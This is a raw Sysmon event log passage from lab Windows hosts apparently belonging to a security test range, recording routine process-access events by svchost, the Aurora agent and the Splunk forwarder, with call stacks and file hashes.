12:28:31.633{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018293Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018292Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018291Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018290Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018289Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E5EF-63C7-3102-00000000B002}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018288Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5EF-63C7-3102-00000000B002}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018287Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.634{E5A8D418-E5EF-63C7-3102-00000000B002}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018286Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.337{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94B661FAB20FCC24EBDE355122F10595,SHA256=1684444A9D6F38C790F30D86C858C710952161C4AB4D5CE85398987C289FAC11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018285Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.259{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=CCFA8AC6BB821ADC34DA87B9FD49C117,SHA256=1F0DCCA4272F136A4E59B951B26BAE9B8B9D366987767483A407F5A05BB0EE9C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.902{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.900{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.896{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.891{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.881{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.871{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.869{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.868{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.845{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.840{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.785{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program 